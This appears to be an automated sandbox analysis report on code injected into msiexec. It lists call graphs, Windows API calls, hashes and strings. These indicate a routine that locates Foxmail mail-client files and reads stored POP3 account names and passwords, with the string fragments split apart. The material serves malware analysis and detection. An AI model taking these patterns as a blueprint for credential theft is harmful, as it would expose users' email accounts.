235967db 7550 2359571e _free 20 API calls 7550->7549 7552 23596806 7551->7552 7561 235967cd 7551->7561 7553 2359680b 7552->7553 7554 23596836 7552->7554 7555 2359637b __dosmaperr 20 API calls 7553->7555 7554->7561 7562 235971d6 7554->7562 7557 23596814 7555->7557 7559 2359571e _free 20 API calls 7557->7559 7558 23596851 7560 2359571e _free 20 API calls 7558->7560 7559->7561 7560->7561 7561->7549 7561->7550 7563 235971e1 7562->7563 7564 23597209 7563->7564 7566 235971fa 7563->7566 7565 23597218 7564->7565 7571 23598a98 7564->7571 7578 23598acb 7565->7578 7568 23596368 __dosmaperr 20 API calls 7566->7568 7570 235971ff ___scrt_fastfail 7568->7570 7570->7558 7572 23598ab8 RtlSizeHeap 7571->7572 7573 23598aa3 7571->7573 7572->7565 7574 23596368 __dosmaperr 20 API calls 7573->7574 7575 23598aa8 7574->7575 7576 235962ac ___std_exception_copy 26 API calls 7575->7576 7577 23598ab3 7576->7577 7577->7565 7579 23598ad8 7578->7579 7580 23598ae3 7578->7580 7581 235956d0 21 API calls 7579->7581 7582 23598aeb 7580->7582 7588 23598af4 __dosmaperr 7580->7588 7586 23598ae0 7581->7586 7583 2359571e _free 20 API calls 7582->7583 7583->7586 7584 23598af9 7587 23596368 __dosmaperr 20 API calls 7584->7587 7585 23598b1e RtlReAllocateHeap 7585->7586 7585->7588 7586->7570 7587->7586 7588->7584 7588->7585 7589 2359474f __dosmaperr 7 API calls 7588->7589 7589->7588 6714 23599e71 6715 23599e95 6714->6715 6716 23599eae 6715->6716 6718 2359ac6b __startOneArgErrorHandling 6715->6718 6719 23599ef8 6716->6719 6722 2359aa53 6716->6722 6721 2359acad __startOneArgErrorHandling 6718->6721 6732 2359b2f0 6718->6732 6723 2359aa70 RtlDecodePointer 6722->6723 6725 2359aa80 6722->6725 6723->6725 6724 23592ada _ValidateLocalCookies 5 API calls 6727 2359ac67 6724->6727 6726 2359ab0d 6725->6726 6728 2359ab02 6725->6728 6730 2359aab7 6725->6730 6726->6728 6729 23596368 __dosmaperr 20 API calls 6726->6729 6727->6719 6728->6724 6729->6728 6730->6728 6731 23596368 __dosmaperr 20 API calls 6730->6731 6731->6728 6733 2359b329 __startOneArgErrorHandling 6732->6733 6734 2359b5c1 __raise_exc RaiseException 6733->6734 6735 2359b350 __startOneArgErrorHandling 6733->6735 6734->6735 6736 2359b393 6735->6736 6737 2359b36e 6735->6737 6738 2359b8b2 __startOneArgErrorHandling 20 API calls 6736->6738 6743 2359b8e1 6737->6743 6740 2359b38e __startOneArgErrorHandling 6738->6740 6741 23592ada _ValidateLocalCookies 5 API calls 6740->6741 6742 2359b3b7 6741->6742 6742->6721 6744 2359b8f0 6743->6744 6745 2359b90f __startOneArgErrorHandling 6744->6745 6746 2359b964 __startOneArgErrorHandling 6744->6746 6748 235978a3 __startOneArgErrorHandling 5 API calls 6745->6748 6747 2359b8b2 __startOneArgErrorHandling 20 API calls 6746->6747 6751 2359b95d 6747->6751 6749 2359b950 6748->6749 6750 2359b8b2 __startOneArgErrorHandling 20 API calls 6749->6750 6749->6751 6750->6751 6751->6740 6752 23593370 6763 23593330 6752->6763 6764 2359334f 6763->6764 6765 23593342 6763->6765 6766 23592ada _ValidateLocalCookies 5 API calls 6765->6766 6766->6764 6922 23595630 6923 2359563b 6922->6923 6925 23595664 6923->6925 6926 23595660 6923->6926 6928 23595eb7 6923->6928 6935 23595688 6925->6935 6929 23595c45 __dosmaperr 5 API calls 6928->6929 6930 23595ede 6929->6930 6931 23595efc InitializeCriticalSectionAndSpinCount 6930->6931 6932 23595ee7 6930->6932 6931->6932 6933 23592ada _ValidateLocalCookies 5 API calls 6932->6933 6934 23595f13 6933->6934 6934->6923 6936 235956b4 6935->6936 6937 23595695 6935->6937 6936->6926 6938 2359569f RtlDeleteCriticalSection 6937->6938 6938->6936 6938->6938 7455 235963f0 7456 23596400 7455->7456 7461 23596416 7455->7461 7457 23596368 __dosmaperr 20 API calls 7456->7457 7458 23596405 7457->7458 7459 235962ac ___std_exception_copy 26 API calls 7458->7459 7470 2359640f 7459->7470 7460 23596480 7462 23594e76 20 API calls 7460->7462 7461->7460 7467 23596561 7461->7467 7474 23596580 7461->7474 7463 235964e5 7462->7463 7465 235964ee 7463->7465 7471 23596573 7463->7471 7485 235985eb 7463->7485 7466 2359571e _free 20 API calls 7465->7466 7466->7467 7494 2359679a 7467->7494 7472 235962bc ___std_exception_copy 11 API calls 7471->7472 7473 2359657f 7472->7473 7475 2359658c 7474->7475 7475->7475 7476 2359637b __dosmaperr 20 API calls 7475->7476 7477 235965ba 7476->7477 7478 235985eb 26 API calls 7477->7478 7479 235965e6 7478->7479 7480 235962bc ___std_exception_copy 11 API calls 7479->7480 7481 23596615 ___scrt_fastfail 7480->7481 7482 235966b6 FindFirstFileExA 7481->7482 7483 23596705 7482->7483 7484 23596580 26 API calls 7483->7484 7486 2359853a 7485->7486 7488 23598554 7486->7488 7489 2359854f 7486->7489 7491 2359858b 7486->7491 7487 23596368 __dosmaperr 20 API calls 7493 2359857a 7487->7493 7488->7463 7489->7487 7489->7488 7490 235962ac ___std_exception_copy 26 API calls 7490->7488 7491->7488 7492 23596368 __dosmaperr 20 API calls 7491->7492 7492->7493 7493->7490 7495 235967a4 7494->7495 7496 235967b4 7495->7496 7497 2359571e _free 20 API calls 7495->7497 7498 2359571e _free 20 API calls 7496->7498 7497->7495 7499 235967bb 7498->7499 7499->7470 7594 23593eb3 7595 23595411 38 API calls 7594->7595 7596 23593ebb 7595->7596 6767 2359ac6b 6768 2359ac84 __startOneArgErrorHandling 6767->6768 6769 2359b2f0 21 API calls 6768->6769 6770 2359acad __startOneArgErrorHandling 6768->6770 6769->6770 6939 2359742b 6942 23597430 6939->6942 6941 23597453 6942->6941 6943 23598bae 6942->6943 6944 23598bbb 6943->6944 6945 23598bdd 6943->6945 6946 23598bc9 RtlDeleteCriticalSection 6944->6946 6947 23598bd7 6944->6947 6945->6942 6946->6946 6946->6947 6948 2359571e _free 20 API calls 6947->6948 6948->6945 7597 235960ac 7598 235960b7 7597->7598 7599 235960dd 7597->7599 7598->7599 7600 235960c7 FreeLibrary 7598->7600 7600->7598 6771 2359506f 6772 23595087 6771->6772 6773 23595081 6771->6773 6775 23595000 6773->6775 6776 2359500d 6775->6776 6777 2359502a 6775->6777 6778 23595024 6776->6778 6779 2359571e _free 20 API calls 6776->6779 6777->6772 6780 2359571e _free 20 API calls 6778->6780 6779->6776 6780->6777 7601 235921a1 ___scrt_dllmain_exception_filter 7500 2359a1e0 7503 2359a1fe 7500->7503 7502 2359a1f6 7504 2359a203 7503->7504 7505 2359aa53 21 API calls 7504->7505 7507 2359a298 7504->7507 7506 2359a42f 7505->7506 7506->7502 7507->7502 7602 235981a0 7603 235981d9 7602->7603 7604 235981dd 7603->7604 7615 23598205 7603->7615 7605 23596368 __dosmaperr 20 API calls 7604->7605 7607 235981e2 7605->7607 7606 23598529 7609 23592ada _ValidateLocalCookies 5 API calls 7606->7609 7608 235962ac ___std_exception_copy 26 API calls 7607->7608 7610 235981ed 7608->7610 7611 23598536 7609->7611 7612 23592ada _ValidateLocalCookies 5 API calls 7610->7612 7613 235981f9 7612->7613 7615->7606 7616 235980c0 7615->7616 7619 235980db 7616->7619 7617 23592ada _ValidateLocalCookies 5 API calls 7618 23598152 7617->7618 7618->7615 7619->7617 7620 2359c7a7 7621 2359c7be 7620->7621 7625 2359c80d 7620->7625 7621->7625 7629 2359c7e6 GetModuleHandleA 7621->7629 7623 2359c872 7624 2359c835 GetModuleHandleA 7624->7625 7625->7623 7625->7624 7626 2359c85f GetProcAddress 7625->7626 7626->7625 7630 2359c7ef 7629->7630 7636 2359c80d 7629->7636 7638 2359c803 GetProcAddress 7630->7638 7633 2359c872 7634 2359c835 GetModuleHandleA 7634->7636 7636->7633 7636->7634 7637 2359c85f GetProcAddress 7636->7637 7637->7636 7642 2359c80d 7638->7642 7639 2359c872 7640 2359c835 GetModuleHandleA 7640->7642 7641 2359c85f GetProcAddress 7641->7642 7642->7639 7642->7640 7642->7641

                      Control-flow Graph

                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23591137
                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23591151
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359115C
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359116D
                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359117C
                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23591193
                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 235911D0
                      • FindClose.KERNEL32(00000000), ref: 235911DB
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                      • String ID:
                      • API String ID: 1083526818-0
                      • Opcode ID: 8f3347f9a4dac6ef7520b884d0811f84fb2fa58a4ca1e0c244ce4bf07a8f8e94
                      • Instruction ID: 321e0a2655f9dd44f1afd060eb96da5df33b238b682cf3684bd8a74c1d0d5ff6
                      • Opcode Fuzzy Hash: 8f3347f9a4dac6ef7520b884d0811f84fb2fa58a4ca1e0c244ce4bf07a8f8e94
                      • Instruction Fuzzy Hash: E0218E725043586BD720EB64AC48F9B7BECEB84314F04092ABA5CD3190FB34E61587D6

                      Control-flow Graph

                      APIs
                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 23591434
                        • Part of subcall function 235910F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 23591137
                        • Part of subcall function 235910F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23591151
                        • Part of subcall function 235910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359115C
                        • Part of subcall function 235910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359116D
                        • Part of subcall function 235910F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 2359117C
                        • Part of subcall function 235910F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 23591193
                        • Part of subcall function 235910F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 235911D0
                        • Part of subcall function 235910F1: FindClose.KERNEL32(00000000), ref: 235911DB
                      • lstrlenW.KERNEL32(?), ref: 235914C5
                      • lstrlenW.KERNEL32(?), ref: 235914E0
                      • lstrlenW.KERNEL32(?,?), ref: 2359150F
                      • lstrcatW.KERNEL32(00000000), ref: 23591521
                      • lstrlenW.KERNEL32(?,?), ref: 23591547
                      • lstrcatW.KERNEL32(00000000), ref: 23591553
                      • lstrlenW.KERNEL32(?,?), ref: 23591579
                      • lstrcatW.KERNEL32(00000000), ref: 23591585
                      • lstrlenW.KERNEL32(?,?), ref: 235915AB
                      • lstrcatW.KERNEL32(00000000), ref: 235915B7
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                      • String ID: )$Foxmail$ProgramFiles
                      • API String ID: 672098462-2938083778
                      • Opcode ID: dd030159d79c7dfe0ddeab6bf97aaec3c373d5d0676f1c24a735f8be9c5f5814
                      • Instruction ID: 84f16dcd20d511669dd4262ff751d4f9897ed91458a59fd64326b5b77c59c34b
                      • Opcode Fuzzy Hash: dd030159d79c7dfe0ddeab6bf97aaec3c373d5d0676f1c24a735f8be9c5f5814
                      • Instruction Fuzzy Hash: 06819271A0036CAAEB30D7A1AC85FEE7379EF84700F0005DAE50DE7190EA719B85CB95
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 235961DA
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 235961E4
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 235961F1
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: a68bdc288a727309383137c010640b5221f5b0033be830fbb964bb05071a07c5
                      • Instruction ID: dbea27dff87c5d9bcd88a015178d79fb1c0ec6df09408a8620fb3d1b46dc7230
                      • Opcode Fuzzy Hash: a68bdc288a727309383137c010640b5221f5b0033be830fbb964bb05071a07c5
                      • Instruction Fuzzy Hash: 1A31E57491131CABDB21DF24D988B9DBBF8BF58310F5041DAE81CAB250E7349B858F85
                      APIs
                      • GetCurrentProcess.KERNEL32(?,?,23594A8A,?,235A2238,0000000C,23594BBD,00000000,00000000,00000001,23592082,235A2108,0000000C,23591F3A,?), ref: 23594AD5
                      • TerminateProcess.KERNEL32(00000000,?,23594A8A,?,235A2238,0000000C,23594BBD,00000000,00000000,00000001,23592082,235A2108,0000000C,23591F3A,?), ref: 23594ADC
                      • ExitProcess.KERNEL32 ref: 23594AEE
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 118d30e435d2c6b66b27eae89882c2fe9e75cb7f4d758aef4110cbc5dccc3c6c
                      • Instruction ID: 12fef0bbe7867065b4a2cd9d58aa90ed2d2605e4784109b37c33951b025ec139
                      • Opcode Fuzzy Hash: 118d30e435d2c6b66b27eae89882c2fe9e75cb7f4d758aef4110cbc5dccc3c6c
                      • Instruction Fuzzy Hash: 71E04632100208AFDF01BF25DD09E4A3BAAEF50341B428050FA0C8B021EB3AED43CAC4
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID:
                      • String ID: .
                      • API String ID: 0-248832578
                      • Opcode ID: 698c04eb5cf515b317ecfe20cde0624fe7b72f59a0597b1eac42f560a7908e39
                      • Instruction ID: 83fea9b47e30e538d6429967d60d109051c29410a9317d751c34b2bdbd4a967f
                      • Opcode Fuzzy Hash: 698c04eb5cf515b317ecfe20cde0624fe7b72f59a0597b1eac42f560a7908e39
                      • Instruction Fuzzy Hash: 2F312671900289AFEB249F78DC84EEA7BFDDB85324F0401ECE91CD7251E6359A498BD0
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: HeapProcess
                      • String ID:
                      • API String ID: 54951025-0
                      • Opcode ID: 0e0024024f33ad9be7d51688facade187aa20efa8f122611d2377e4d921d94a4
                      • Instruction ID: 0e09297dc8d3122e5230f41ac299f13a1394ab8adc851f16a6e638476b327eb7
                      • Opcode Fuzzy Hash: 0e0024024f33ad9be7d51688facade187aa20efa8f122611d2377e4d921d94a4
                      • Instruction Fuzzy Hash: E0A02230300203CF8300AF3A830EB0CBAFEBA202C0303002AA80CC2000FB3CC003AB00

                      Control-flow Graph

                      APIs
                        • Part of subcall function 23591CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D1B
                        • Part of subcall function 23591CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23591D37
                        • Part of subcall function 23591CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D4B
                      • _strlen.LIBCMT ref: 23591855
                      • _strlen.LIBCMT ref: 23591869
                      • _strlen.LIBCMT ref: 2359188B
                      • _strlen.LIBCMT ref: 235918AE
                      • _strlen.LIBCMT ref: 235918C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _strlen$File$CopyCreateDelete
                      • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                      • API String ID: 3296212668-3023110444
                      • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction ID: 6e2fb451285dac8ea9bc1b8ba1e86b0e5fc0f3ca5cadbc70486073904a80ed9d
                      • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                      • Instruction Fuzzy Hash: 9A61E271D00328AEFF21DBA4E840BDEB7BDAF55204F0444D6D20DAA250DB749B478BD6

                      Control-flow Graph

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: %m$~$Gon~$~F@7$~dra
                      • API String ID: 4218353326-230879103
                      • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction ID: 2e948c0656cc1a40c0628f06845312497bb8b1da0d136d37f154aa63dfa34551
                      • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                      • Instruction Fuzzy Hash: 9D7106B1D00328ABEB21DBB5A884AEE7BFC9B55204F1440D6D64CD7241E675DB86CBE0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 203 23597cc2-23597cd6 204 23597cd8-23597cdd 203->204 205 23597d44-23597d4c 203->205 204->205 208 23597cdf-23597ce4 204->208 206 23597d4e-23597d51 205->206 207 23597d93-23597dab call 23597e35 205->207 206->207 209 23597d53-23597d90 call 2359571e * 4 206->209 216 23597dae-23597db5 207->216 208->205 211 23597ce6-23597ce9 208->211 209->207 211->205 214 23597ceb-23597cf3 211->214 217 23597d0d-23597d15 214->217 218 23597cf5-23597cf8 214->218 219 23597dd4-23597dd8 216->219 220 23597db7-23597dbb 216->220 223 23597d2f-23597d43 call 2359571e * 2 217->223 224 23597d17-23597d1a 217->224 218->217 221 23597cfa-23597d0c call 2359571e call 235990ba 218->221 230 23597dda-23597ddf 219->230 231 23597df0-23597dfc 219->231 225 23597dbd-23597dc0 220->225 226 23597dd1 220->226 221->217 223->205 224->223 229 23597d1c-23597d2e call 2359571e call 235991b8 224->229 225->226 234 23597dc2-23597dd0 call 2359571e * 2 225->234 226->219 229->223 238 23597ded 230->238 239 23597de1-23597de4 230->239 231->216 233 23597dfe-23597e0b call 2359571e 231->233 234->226 238->231 239->238 246 23597de6-23597dec call 2359571e 239->246 246->238
                      APIs
                      • ___free_lconv_mon.LIBCMT ref: 23597D06
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 235990D7
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 235990E9
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 235990FB
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 2359910D
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 2359911F
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 23599131
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 23599143
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 23599155
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 23599167
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 23599179
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 2359918B
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 2359919D
                        • Part of subcall function 235990BA: _free.LIBCMT ref: 235991AF
                      • _free.LIBCMT ref: 23597CFB
                        • Part of subcall function 2359571E: HeapFree.KERNEL32(00000000,00000000,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?), ref: 23595734
                        • Part of subcall function 2359571E: GetLastError.KERNEL32(?,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?,?), ref: 23595746
                      • _free.LIBCMT ref: 23597D1D
                      • _free.LIBCMT ref: 23597D32
                      • _free.LIBCMT ref: 23597D3D
                      • _free.LIBCMT ref: 23597D5F
                      • _free.LIBCMT ref: 23597D72
                      • _free.LIBCMT ref: 23597D80
                      • _free.LIBCMT ref: 23597D8B
                      • _free.LIBCMT ref: 23597DC3
                      • _free.LIBCMT ref: 23597DCA
                      • _free.LIBCMT ref: 23597DE7
                      • _free.LIBCMT ref: 23597DFF
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                      • String ID:
                      • API String ID: 161543041-0
                      • Opcode ID: af570963e2b9bb8a24eb79cfacd54780bfff8a88de3cacd47714c9106a4b7dd0
                      • Instruction ID: 94612819522a566f5dd53d2ac8d1ec824d41adb21c6c33201100900dab5bc1c2
                      • Opcode Fuzzy Hash: af570963e2b9bb8a24eb79cfacd54780bfff8a88de3cacd47714c9106a4b7dd0
                      • Instruction Fuzzy Hash: C1311B71600304DFFB21AB38F940B6A77F9EF40250F154C9AE85EDB191DB31EA908B94

                      Control-flow Graph

                      APIs
                      • _free.LIBCMT ref: 235959EA
                        • Part of subcall function 2359571E: HeapFree.KERNEL32(00000000,00000000,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?), ref: 23595734
                        • Part of subcall function 2359571E: GetLastError.KERNEL32(?,?,2359924F,?,00000000,?,00000000,?,23599276,?,00000007,?,?,23597E5A,?,?), ref: 23595746
                      • _free.LIBCMT ref: 235959F6
                      • _free.LIBCMT ref: 23595A01
                      • _free.LIBCMT ref: 23595A0C
                      • _free.LIBCMT ref: 23595A17
                      • _free.LIBCMT ref: 23595A22
                      • _free.LIBCMT ref: 23595A2D
                      • _free.LIBCMT ref: 23595A38
                      • _free.LIBCMT ref: 23595A43
                      • _free.LIBCMT ref: 23595A51
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 7a044b18495e0db5b950a11f75e8b8f7da6984f35a65f0343674850077f7c6ca
                      • Instruction ID: 150c65ab36efae9efd22a8b90d6ae15aa831c9f8ba66003463b2ed34d5134cce
                      • Opcode Fuzzy Hash: 7a044b18495e0db5b950a11f75e8b8f7da6984f35a65f0343674850077f7c6ca
                      • Instruction Fuzzy Hash: B811A47A520248EFEB21DF54EE41CDD3FB9EF54290B1544E1BE0D8B221DA31EB609B80

                      Control-flow Graph

                      APIs
                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D1B
                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 23591D37
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D4B
                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D58
                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D72
                      • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D7D
                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 23591D8A
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: File$Delete$CloseCopyCreateHandleReadSize
                      • String ID:
                      • API String ID: 1454806937-0
                      • Opcode ID: bba7b6e55dde6bda0829be74fcbd520ccf95975cf539ac2dab1c60c106ff6325
                      • Instruction ID: b11fea5f99cb2506d3fd0007394f3bbdef03459ae93377f7f5d1b9d5f0475f9e
                      • Opcode Fuzzy Hash: bba7b6e55dde6bda0829be74fcbd520ccf95975cf539ac2dab1c60c106ff6325
                      • Instruction Fuzzy Hash: 462124B194121CBFE710AB609D8CEEA76FCEB58254F0605A6F619D2140E774AE468AF0

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 304 23599492-235994ef GetConsoleCP 305 23599632-23599644 call 23592ada 304->305 306 235994f5-23599511 304->306 307 2359952c-2359953d call 23597c19 306->307 308 23599513-2359952a 306->308 315 2359953f-23599542 307->315 316 23599563-23599565 307->316 310 23599566-23599575 call 235979e6 308->310 310->305 320 2359957b-2359959b WideCharToMultiByte 310->320 318 23599609-23599628 315->318 319 23599548-2359955a call 235979e6 315->319 316->310 318->305 319->305 327 23599560-23599561 319->327 320->305 322 235995a1-235995b7 WriteFile 320->322 323 235995b9-235995ca 322->323 324 2359962a-23599630 GetLastError 322->324 323->305 326 235995cc-235995d0 323->326 324->305 328 235995fe-23599601 326->328 329 235995d2-235995f0 WriteFile 326->329 327->320 328->306 331 23599607 328->331 329->324 330 235995f2-235995f6 329->330 330->305 332 235995f8-235995fb 330->332 331->305 332->328
                      APIs
                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,23599C07,?,00000000,?,00000000,00000000), ref: 235994D4
                      • __fassign.LIBCMT ref: 2359954F
                      • __fassign.LIBCMT ref: 2359956A
                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 23599590
                      • WriteFile.KERNEL32(?,?,00000000,23599C07,00000000,?,?,?,?,?,?,?,?,?,23599C07,?), ref: 235995AF
                      • WriteFile.KERNEL32(?,?,00000001,23599C07,00000000,?,?,?,?,?,?,?,?,?,23599C07,?), ref: 235995E8
                      Memory Dump Source
